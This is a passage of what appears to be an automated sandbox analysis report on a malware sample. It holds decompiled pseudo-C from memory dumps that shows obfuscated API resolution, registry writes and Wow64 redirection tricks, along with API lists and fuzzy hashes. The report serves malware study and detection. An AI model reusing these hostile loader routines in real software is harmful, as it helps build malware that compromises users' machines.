                  					if(_t74 == 0) {
                  						_t37 = 0;
                  					} else {
                  						_t44 =  *0xdcd22c; // 0x63699bc3
                  						_t37 = E00DC1273(_t75, _t74, _t44 ^ 0xb30fc035);
                  					}
                  					if(_t37 != 0 && E00DC73B3(0, _t37) != 0) {
                  						_t90 =  *0xdcd2dc; // 0x5119630
                  						E00DC5B10(_t90 + 4, _t42);
                  					}
                  					_t38 =  *0xdcd230; // 0x434a5a8
                  					_t18 = _t38 + 0xdce2d2; // 0x511887a
                  					_t19 = _t38 + 0xdce7c4; // 0x6976612e
                  					 *0xdcd27c = _t18;
                  					 *0xdcd2f4 = _t19;
                  					HeapFree( *0xdcd1f0, 0, _t74);
                  					L48:
                  					return 0;
                  				}
                  			}


                  APIs
                  • StrToIntExA.SHLWAPI(00000000,00000000,00DC79CC,?,00DC79CC,63699BC3,?,00DC79CC,63699BC3,E8FA7DD7,00DCD00C,7742C740,?,?,00DC79CC), ref: 00DC594F
                  • StrToIntExA.SHLWAPI(00000000,00000000,00DC79CC,?,00DC79CC,63699BC3,?,00DC79CC,63699BC3,E8FA7DD7,00DCD00C,7742C740,?,?,00DC79CC), ref: 00DC5981
                  • StrToIntExA.SHLWAPI(00000000,00000000,00DC79CC,?,00DC79CC,63699BC3,?,00DC79CC,63699BC3,E8FA7DD7,00DCD00C,7742C740,?,?,00DC79CC), ref: 00DC59B3
                  • StrToIntExA.SHLWAPI(00000000,00000000,00DC79CC,?,00DC79CC,63699BC3,?,00DC79CC,63699BC3,E8FA7DD7,00DCD00C,7742C740,?,?,00DC79CC), ref: 00DC59E5
                  • StrToIntExA.SHLWAPI(00000000,00000000,00DC79CC,?,00DC79CC,63699BC3,?,00DC79CC,63699BC3,E8FA7DD7,00DCD00C,7742C740,?,?,00DC79CC), ref: 00DC5A17
                  • HeapFree.KERNEL32(00000000,?,?,00DC79CC,63699BC3,?,00DC79CC,63699BC3,E8FA7DD7,00DCD00C,7742C740,?,?,00DC79CC), ref: 00DC5AB3
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: FreeHeap
                  • String ID:
                  • API String ID: 3298025750-0
                  • Opcode ID: 0af3b4ae0f1c6b44d591b2f52dcd47df474b01a130b87bfb0ae3714a93712f36
                  • Instruction ID: b94953b6f30af12c0263da06c52e915c77fb0a1f1a7df7b0a19951042cfc65d9
                  • Opcode Fuzzy Hash: 0af3b4ae0f1c6b44d591b2f52dcd47df474b01a130b87bfb0ae3714a93712f36
                  • Instruction Fuzzy Hash: 55519775A00617EACB11DBB5EC85E5BB7A9D7483507684A69F002D7219EA30FD809E38
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 00DC8448
                  • SysAllocString.OLEAUT32(0070006F), ref: 00DC845C
                  • SysAllocString.OLEAUT32(00000000), ref: 00DC846E
                  • SysFreeString.OLEAUT32(00000000), ref: 00DC84D2
                  • SysFreeString.OLEAUT32(00000000), ref: 00DC84E1
                  • SysFreeString.OLEAUT32(00000000), ref: 00DC84EC
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: String$AllocFree
                  • String ID:
                  • API String ID: 344208780-0
                  • Opcode ID: d19b6337c08567dc3a1994738bd38aac24dcce890bcd28bddc475935398319a7
                  • Instruction ID: 54ba04ac564ffcefb1a819fc9998424510d6fe58f96ecd0d26b53ebcbfa60804
                  • Opcode Fuzzy Hash: d19b6337c08567dc3a1994738bd38aac24dcce890bcd28bddc475935398319a7
                  • Instruction Fuzzy Hash: D9312E32D1060BABDB01DFA8C844E9FB7BAAF49311F154469ED15EB220DB719D06CBA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00DC40AF(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                  				intOrPtr _v8;
                  				intOrPtr _t23;
                  				intOrPtr _t26;
                  				_Unknown_base(*)()* _t28;
                  				intOrPtr _t30;
                  				_Unknown_base(*)()* _t32;
                  				intOrPtr _t33;
                  				_Unknown_base(*)()* _t35;
                  				intOrPtr _t36;
                  				_Unknown_base(*)()* _t38;
                  				intOrPtr _t39;
                  				_Unknown_base(*)()* _t41;
                  				intOrPtr _t44;
                  				struct HINSTANCE__* _t48;
                  				intOrPtr _t54;
                  
                  				_t54 = E00DC75C4(0x20);
                  				if(_t54 == 0) {
                  					_v8 = 8;
                  				} else {
                  					_t23 =  *0xdcd230; // 0x434a5a8
                  					_t1 = _t23 + 0xdce11a; // 0x4c44544e
                  					_t48 = GetModuleHandleA(_t1);
                  					_t26 =  *0xdcd230; // 0x434a5a8
                  					_t2 = _t26 + 0xdce787; // 0x7243775a
                  					_v8 = 0x7f;
                  					_t28 = GetProcAddress(_t48, _t2);
                  					 *(_t54 + 0xc) = _t28;
                  					if(_t28 == 0) {
                  						L8:
                  						E00DC4C31(_t54);
                  					} else {
                  						_t30 =  *0xdcd230; // 0x434a5a8
                  						_t5 = _t30 + 0xdce774; // 0x614d775a
                  						_t32 = GetProcAddress(_t48, _t5);
                  						 *(_t54 + 0x10) = _t32;
                  						if(_t32 == 0) {
                  							goto L8;
                  						} else {
                  							_t33 =  *0xdcd230; // 0x434a5a8
                  							_t7 = _t33 + 0xdce797; // 0x6e55775a
                  							_t35 = GetProcAddress(_t48, _t7);
                  							 *(_t54 + 0x14) = _t35;
                  							if(_t35 == 0) {
                  								goto L8;
                  							} else {
                  								_t36 =  *0xdcd230; // 0x434a5a8
                  								_t9 = _t36 + 0xdce756; // 0x4e6c7452
                  								_t38 = GetProcAddress(_t48, _t9);
                  								 *(_t54 + 0x18) = _t38;
                  								if(_t38 == 0) {
                  									goto L8;
                  								} else {
                  									_t39 =  *0xdcd230; // 0x434a5a8
                  									_t11 = _t39 + 0xdce7ac; // 0x6c43775a
                  									_t41 = GetProcAddress(_t48, _t11);
                  									 *(_t54 + 0x1c) = _t41;
                  									if(_t41 == 0) {
                  										goto L8;
                  									} else {
                  										 *((intOrPtr*)(_t54 + 4)) = _a4;
                  										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                  										_t44 = E00DC4F73(_t54, _a8);
                  										_v8 = _t44;
                  										if(_t44 != 0) {
                  											goto L8;
                  										} else {
                  											 *_a12 = _t54;
                  										}
                  									}
                  								}
                  							}
                  						}
                  					}
                  				}
                  				return _v8;
                  			}


                  APIs
                    • Part of subcall function 00DC75C4: RtlAllocateHeap.NTDLL(00000000,00000000,00DC5068), ref: 00DC75D0
                  • GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,00DC7E5B,?,?,?,?,00000000,00000000), ref: 00DC40D4
                  • GetProcAddress.KERNEL32(00000000,7243775A), ref: 00DC40F6
                  • GetProcAddress.KERNEL32(00000000,614D775A), ref: 00DC410C
                  • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00DC4122
                  • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00DC4138
                  • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00DC414E
                    • Part of subcall function 00DC4F73: memset.NTDLL ref: 00DC4FF2
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: AddressProc$AllocateHandleHeapModulememset
                  • String ID:
                  • API String ID: 1886625739-0
                  • Opcode ID: 4c7d6e7aa4ebd643b7545df3a521395aee872128fc5faa92131cd4d035cfa3ce
                  • Instruction ID: 42eb6d6ba62e2ea5bce09606561f6ecf0f4219d3c48dc7b4aa73e3bb54a9d4da
                  • Opcode Fuzzy Hash: 4c7d6e7aa4ebd643b7545df3a521395aee872128fc5faa92131cd4d035cfa3ce
                  • Instruction Fuzzy Hash: 4F214CB150070BAFDB10DFA9CD84E6ABBECEB193407094569E549CB251E735E901CFB4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetLastError.KERNEL32(?,?,702962A1,7029443D,70293CD7), ref: 7029633F
                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 7029634D
                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 70296366
                  • SetLastError.KERNEL32(00000000,?,702962A1,7029443D,70293CD7), ref: 702963B8
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: ErrorLastValue___vcrt_
                  • String ID:
                  • API String ID: 3852720340-0
                  • Opcode ID: eb0c4c332fe0ee45b00492d607b2bcfb2d569901029532b0417ca3ea41bf15f5
                  • Instruction ID: 50009566beab13a19045c639180217a405e2d856094ecd8fd7542b202352a7d1
                  • Opcode Fuzzy Hash: eb0c4c332fe0ee45b00492d607b2bcfb2d569901029532b0417ca3ea41bf15f5
                  • Instruction Fuzzy Hash: 4C0124332393125EE7016A766C8DB2F36F9DB09A34B31022DF912B42F0EE115C20AA4C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 88%
                  			E00DCA360(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
                  				signed int _v8;
                  				char _v12;
                  				signed int* _v16;
                  				void _v284;
                  				void* __esi;
                  				char* _t60;
                  				intOrPtr* _t61;
                  				intOrPtr _t65;
                  				char _t68;
                  				intOrPtr _t72;
                  				void* _t73;
                  				intOrPtr _t75;
                  				void* _t78;
                  				void* _t88;
                  				void* _t96;
                  				void* _t97;
                  				int _t102;
                  				signed int* _t104;
                  				intOrPtr* _t105;
                  				void* _t106;
                  
                  				_t97 = __ecx;
                  				_v8 = _v8 & 0x00000000;
                  				_t102 = _a16;
                  				if(_t102 == 0) {
                  					__imp__( &_v284,  *0xdcd2ec);
                  					_t96 = 0x80000002;
                  					L6:
                  					_t60 = E00DC745D(0,  &_v284);
                  					_a8 = _t60;
                  					if(_t60 == 0) {
                  						_v8 = 8;
                  						L29:
                  						_t61 = _a20;
                  						if(_t61 != 0) {
                  							 *_t61 =  *_t61 + 1;
                  						}
                  						return _v8;
                  					}
                  					_t105 = _a24;
                  					if(E00DC8557(_t97, _t105, _t96, _t60) != 0) {
                  						L27:
                  						E00DC4C31(_a8);
                  						goto L29;
                  					}
                  					_t65 =  *0xdcd230; // 0x434a5a8
                  					_t16 = _t65 + 0xdce908; // 0x65696c43
                  					_t68 = E00DC745D(0, _t16);
                  					_a24 = _t68;
                  					if(_t68 == 0) {
                  						L14:
                  						_t29 = _t105 + 0x14; // 0x102
                  						_t33 = _t105 + 0x10; // 0x3d00dcc0
                  						if(E00DC7325( *_t33, _t96, _a8,  *0xdcd2e4,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
                  							_t72 =  *0xdcd230; // 0x434a5a8
                  							if(_t102 == 0) {
                  								_t35 = _t72 + 0xdcea0f; // 0x4d4c4b48
                  								_t73 = _t35;
                  							} else {
                  								_t34 = _t72 + 0xdce927; // 0x55434b48
                  								_t73 = _t34;
                  							}
                  							if(E00DC7D0C( &_a24, _t73,  *0xdcd2e4,  *0xdcd2e8,  &_a24,  &_a16) == 0) {
                  								if(_t102 == 0) {
                  									_t75 =  *0xdcd230; // 0x434a5a8
                  									_t44 = _t75 + 0xdce893; // 0x74666f53
                  									_t78 = E00DC745D(0, _t44);
                  									_t103 = _t78;
                  									if(_t78 == 0) {
                  										_v8 = 8;
                  									} else {
                  										_t47 = _t105 + 0x10; // 0x3d00dcc0
                  										E00DC3FF3( *_t47, _t96, _a8,  *0xdcd2e8, _a24);
                  										_t49 = _t105 + 0x10; // 0x3d00dcc0
                  										E00DC3FF3( *_t49, _t96, _t103,  *0xdcd2e0, _a16);
                  										E00DC4C31(_t103);
                  									}
                  								} else {
                  									_t40 = _t105 + 0x10; // 0x3d00dcc0
                  									E00DC3FF3( *_t40, _t96, _a8,  *0xdcd2e8, _a24);
                  									_t43 = _t105 + 0x10; // 0x3d00dcc0
                  									E00DC3FF3( *_t43, _t96, _a8,  *0xdcd2e0, _a16);
                  								}
                  								if( *_t105 != 0) {
                  									E00DC4C31(_a24);
                  								} else {
                  									 *_t105 = _a16;
                  								}
                  							}
                  						}
                  						goto L27;
                  					}
                  					_t21 = _t105 + 0x10; // 0x3d00dcc0
                  					if(E00DC51C4( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
                  						_t104 = _v16;
                  						_t88 = 0x28;
                  						if(_v12 == _t88) {
                  							 *_t104 =  *_t104 & 0x00000000;
                  							_t26 = _t105 + 0x10; // 0x3d00dcc0
                  							E00DC7325( *_t26, _t96, _a8, _a24, _t104);
                  						}
                  						E00DC4C31(_t104);
                  						_t102 = _a16;
                  					}
                  					E00DC4C31(_a24);
                  					goto L14;
                  				}
                  				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                  					goto L29;
                  				} else {
                  					memcpy( &_v284, _a8, _t102);
                  					__imp__(_t106 + _t102 - 0x117,  *0xdcd2ec);
                  					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
                  					_t96 = 0x80000003;
                  					goto L6;
                  				}
                  			}
























                  APIs
                  • StrChrA.SHLWAPI(00DC544E,0000005F,00000000,00000000,00000104), ref: 00DCA393
                  • memcpy.NTDLL(?,00DC544E,?), ref: 00DCA3AC
                  • lstrcpy.KERNEL32(?), ref: 00DCA3C2
                    • Part of subcall function 00DC745D: lstrlen.KERNEL32(?,00DCD2E0,74B47FC0,00000000,00DC534B,?,?,?,?,?,00DC70B5,?), ref: 00DC7466
                    • Part of subcall function 00DC745D: mbstowcs.NTDLL ref: 00DC748D
                    • Part of subcall function 00DC745D: memset.NTDLL ref: 00DC749F
                    • Part of subcall function 00DC3FF3: lstrlenW.KERNEL32(00DC544E,?,?,00DCA536,3D00DCC0,80000002,00DC544E,00DC5886,74666F53,4D4C4B48,00DC5886,?,3D00DCC0,80000002,00DC544E,?), ref: 00DC4013
                    • Part of subcall function 00DC4C31: HeapFree.KERNEL32(00000000,00000000,00DC5130,00000000,?,?,00000000,?,?,?,?,?,?,00DC8792,00000000), ref: 00DC4C3D
                  • lstrcpy.KERNEL32(?,00000000), ref: 00DCA3E4
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
                  • String ID: \
                  • API String ID: 2598994505-2967466578
                  • Opcode ID: 3b50fb18901c3385a4b09bc22092f8e16fa3c1003d206be27fdae474e0701c0f
                  • Instruction ID: 195a5ba792ef96ac44489f40cbb5bba920d8447980a120eb453f379bfa822ecd
                  • Opcode Fuzzy Hash: 3b50fb18901c3385a4b09bc22092f8e16fa3c1003d206be27fdae474e0701c0f
                  • Instruction Fuzzy Hash: 3551147251020FAFCF119FA4DD45FAABBBAEB08304F048429FA1597261DB35DA15AF31
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  • C:\Windows\SysWOW64\rundll32.exe, xrefs: 7029F85C
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID: C:\Windows\SysWOW64\rundll32.exe
                  • API String ID: 0-2837366778
                  • Opcode ID: b6bb9cc44e01b28305582d7d57d403f723517ca9bdf98a297b5cd2f9f57a8d61
                  • Instruction ID: 1ba3278f7989111da17d1ba8c1d844d137fd387a29c8836f2f7272c0f783addf
                  • Opcode Fuzzy Hash: b6bb9cc44e01b28305582d7d57d403f723517ca9bdf98a297b5cd2f9f57a8d61
                  • Instruction Fuzzy Hash: 6921B0736202067FE7C19F659C81B5F77AEEF402687204524F81AA7160EB30ED208BA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetStdHandle.KERNEL32(000000F4,?,00000044), ref: 7029955C
                  • GetFileType.KERNEL32(00000000,?,00000044), ref: 7029956E
                  • swprintf.LIBCMT ref: 7029958F
                  • WriteConsoleW.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,00000044), ref: 702995CC
                  Strings
                  • Assertion failed: %Ts, file %Ts, line %d, xrefs: 70299584
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: ConsoleFileHandleTypeWriteswprintf
                  • String ID: Assertion failed: %Ts, file %Ts, line %d
                  • API String ID: 2943507729-1719349581
                  • Opcode ID: 37b95ce0d41be92c9f1c00dae23f47cef1c7926c00b1182c16354afcc0058542
                  • Instruction ID: c5240adb9a875a3bcc99c6579dd257d807f6fe95c58e84f05380db9e626aff0d
                  • Opcode Fuzzy Hash: 37b95ce0d41be92c9f1c00dae23f47cef1c7926c00b1182c16354afcc0058542
                  • Instruction Fuzzy Hash: 811193B35011196BCB119F2E8C44A9F777DEF44220FA14659EA16A7140EE309E568B68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 32%
                  			E00DC3267(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
                  				intOrPtr _v36;
                  				intOrPtr _v44;
                  				intOrPtr _v48;
                  				intOrPtr _v52;
                  				void _v60;
                  				char _v64;
                  				long _t18;
                  				intOrPtr _t22;
                  				intOrPtr _t23;
                  				long _t29;
                  				intOrPtr _t30;
                  				intOrPtr _t31;
                  				intOrPtr* _t32;
                  
                  				_t30 = __edi;
                  				_t29 = _a4;
                  				_t31 = __eax;
                  				_t18 = E00DC83EC(_t29, __edi, __eax);
                  				_a4 = _t18;
                  				if(_t18 != 0) {
                  					memset( &_v60, 0, 0x38);
                  					_t22 =  *0xdcd230; // 0x434a5a8
                  					_v64 = 0x3c;
                  					if(_a8 == 0) {
                  						_t7 = _t22 + 0xdce4e0; // 0x70006f
                  						_t23 = _t7;
                  					} else {
                  						_t6 = _t22 + 0xdce92c; // 0x750072
                  						_t23 = _t6;
                  					}
                  					_v36 = _t31;
                  					_t32 = __imp__;
                  					_v52 = _t23;
                  					_v48 = _t29;
                  					_v44 = _t30;
                  					 *_t32(0);
                  					_push( &_v64);
                  					if( *0xdcd0e4() != 0) {
                  						_a4 = _a4 & 0x00000000;
                  					} else {
                  						_a4 = GetLastError();
                  					}
                  					 *_t32(1);
                  				}
                  				return _a4;
                  			}

















                  APIs
                    • Part of subcall function 00DC83EC: SysAllocString.OLEAUT32(?), ref: 00DC8448
                    • Part of subcall function 00DC83EC: SysAllocString.OLEAUT32(0070006F), ref: 00DC845C
                    • Part of subcall function 00DC83EC: SysAllocString.OLEAUT32(00000000), ref: 00DC846E
                    • Part of subcall function 00DC83EC: SysFreeString.OLEAUT32(00000000), ref: 00DC84D2
                  • memset.NTDLL ref: 00DC328B
                  • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00DC32C7
                  • GetLastError.KERNEL32 ref: 00DC32D7
                  • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00DC32E8
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
                  • String ID: <
                  • API String ID: 593937197-4251816714
                  • Opcode ID: fcf859391e0e420374093989ec427f0865bf77e854e0a9bbdbe702cfe53a9005
                  • Instruction ID: 3bd86ad82dbf5df0d60372bc8089d99870c92b1e1bbbb4ba7786e424be5d3044
                  • Opcode Fuzzy Hash: fcf859391e0e420374093989ec427f0865bf77e854e0a9bbdbe702cfe53a9005
                  • Instruction Fuzzy Hash: 4C11FA7190031AABDB10DFA9DC85FD9BBBCAB08385F14801AF909E7251D775D6048FB9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: _free$AllocateHeap
                  • String ID:
                  • API String ID: 3033488037-0
                  • Opcode ID: 14b0cf5e1745e6b20b26e65504a303ce44a1879d031fce6fb37311801ffb7af1
                  • Instruction ID: 31a15841f4046ada50757526a5f59d4359d72e8545c0d090dfd5045294d91713
                  • Opcode Fuzzy Hash: 14b0cf5e1745e6b20b26e65504a303ce44a1879d031fce6fb37311801ffb7af1
                  • Instruction Fuzzy Hash: AB519073A24205AFDB11DF69C841B5EB7F9FF49728B10056DE806E7260E731E9218F49
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 58%
                  			E00DC1650(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
                  				char _v5;
                  				signed int _v12;
                  				intOrPtr _v16;
                  				char _t28;
                  				void* _t36;
                  				void* _t41;
                  				char* _t42;
                  				void* _t44;
                  				void* _t49;
                  				void* _t50;
                  				int _t51;
                  				int _t54;
                  				void* _t55;
                  
                  				_t49 = _a4;
                  				_t55 = __eax;
                  				_v12 = 0xb;
                  				if(_t49 != 0 && __eax != 0) {
                  					_t5 = _t55 - 1; // -1
                  					_t42 = _t49 + _t5;
                  					_t28 =  *_t42;
                  					_v5 = _t28;
                  					 *_t42 = 0;
                  					__imp__(_a8, _t41);
                  					_v16 = _t28;
                  					_t50 =  *0xdcd100(_t49, _a8);
                  					if(_t50 != 0) {
                  						 *_t42 = _v5;
                  						_t44 = RtlAllocateHeap( *0xdcd1f0, 0, _a16 + __eax);
                  						if(_t44 == 0) {
                  							_v12 = 8;
                  						} else {
                  							_t51 = _t50 - _a4;
                  							memcpy(_t44, _a4, _t51);
                  							_t36 = memcpy(_t44 + _t51, _a12, _a16);
                  							_t45 = _v16;
                  							_t54 = _a16;
                  							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
                  							 *_a20 = _t44;
                  							_v12 = _v12 & 0x00000000;
                  							 *_a24 = _t55 - _v16 + _t54;
                  						}
                  					}
                  				}
                  				return _v12;
                  			}

















                  APIs
                  • lstrlen.KERNEL32(74B5F710,?,00000000,?,74B5F710), ref: 00DC1684
                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 00DC16B0
                  • memcpy.NTDLL(00000000,0000000B,0000000B), ref: 00DC16C4
                  • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 00DC16D3
                  • memcpy.NTDLL(00000000,0000000B,?,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 00DC16EE
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: memcpy$AllocateHeaplstrlen
                  • String ID:
                  • API String ID: 1819133394-0
                  • Opcode ID: b518fe57261f1e53e133eb8bd4fa7158b87575b866135f28f5be1f697e9a9761
                  • Instruction ID: 09e803e89340f89457bbc442a5207cd5534dfb2fe33b45e45ca1ec8eced91242
                  • Opcode Fuzzy Hash: b518fe57261f1e53e133eb8bd4fa7158b87575b866135f28f5be1f697e9a9761
                  • Instruction Fuzzy Hash: EE216D7A90021AAFCF118F68CC44F9EBF79EF85300F188158F804A7315C630A915CBB0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • _free.LIBCMT ref: 702A3BAE
                    • Part of subcall function 7029C6CF: HeapFree.KERNEL32(00000000,00000000,?,7029A4F1), ref: 7029C6E5
                    • Part of subcall function 7029C6CF: GetLastError.KERNEL32(?,?,7029A4F1), ref: 7029C6F7
                  • _free.LIBCMT ref: 702A3BC0
                  • _free.LIBCMT ref: 702A3BD2
                  • _free.LIBCMT ref: 702A3BE4
                  • _free.LIBCMT ref: 702A3BF6
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: d8d600fcef8ce8b76e4875a885f9961188719d162a48b1145f07d79dba3e4237
                  • Instruction ID: 40b26ad094e8785b229defb0451d0be5f69aa012b49c7fb05c76ff252c801548
                  • Opcode Fuzzy Hash: d8d600fcef8ce8b76e4875a885f9961188719d162a48b1145f07d79dba3e4237
                  • Instruction Fuzzy Hash: ACF0E7735582019BC654DF59E9CAE1EB3EEAA807147703C09F90AE7521CF30FCA08E68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00DC7A5D(intOrPtr _a4) {
                  				void* _t2;
                  				long _t4;
                  				void* _t5;
                  				long _t6;
                  				void* _t7;
                  
                  				_t2 = CreateEventA(0, 1, 0, 0);
                  				 *0xdcd224 = _t2;
                  				if(_t2 == 0) {
                  					return GetLastError();
                  				}
                  				_t4 = GetVersion();
                  				if(_t4 <= 5) {
                  					_t5 = 0x32;
                  					return _t5;
                  				}
                  				 *0xdcd214 = _t4;
                  				_t6 = GetCurrentProcessId();
                  				 *0xdcd210 = _t6;
                  				 *0xdcd21c = _a4;
                  				_t7 = OpenProcess(0x10047a, 0, _t6);
                  				 *0xdcd20c = _t7;
                  				if(_t7 == 0) {
                  					 *0xdcd20c =  *0xdcd20c | 0xffffffff;
                  				}
                  				return 0;
                  			}









                  APIs
                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00DC8753,?,?,00000001), ref: 00DC7A65
                  • GetVersion.KERNEL32(?,00000001), ref: 00DC7A74
                  • GetCurrentProcessId.KERNEL32(?,00000001), ref: 00DC7A83
                  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 00DC7AA0
                  • GetLastError.KERNEL32(?,00000001), ref: 00DC7ABF
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                  • String ID:
                  • API String ID: 2270775618-0
                  • Opcode ID: d59bca8a1547548d47697961448208ec0df34f277652043acf6d1e72bb736ab0
                  • Instruction ID: a703fb8845c0d2584edefb06e616050df88a5b6def3c5fd87226a83db849f2af
                  • Opcode Fuzzy Hash: d59bca8a1547548d47697961448208ec0df34f277652043acf6d1e72bb736ab0
                  • Instruction Fuzzy Hash: F8F0F4B0A94303EAD7209B24AD09F187BA2A708740F148529F25AC63E0E6708A01AF39
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: _free
                  • String ID: *?
                  • API String ID: 269201875-2564092906
                  • Opcode ID: 3bcf00fbe7c83672af3c444a8453a29fb2d6e3d48c0e41ffb646aa8c76bc52e5
                  • Instruction ID: 32057173ecd0079e1b5ace7499e0d89d8d5776ce97f5f0989248f3d4dfabfa4b
                  • Opcode Fuzzy Hash: 3bcf00fbe7c83672af3c444a8453a29fb2d6e3d48c0e41ffb646aa8c76bc52e5
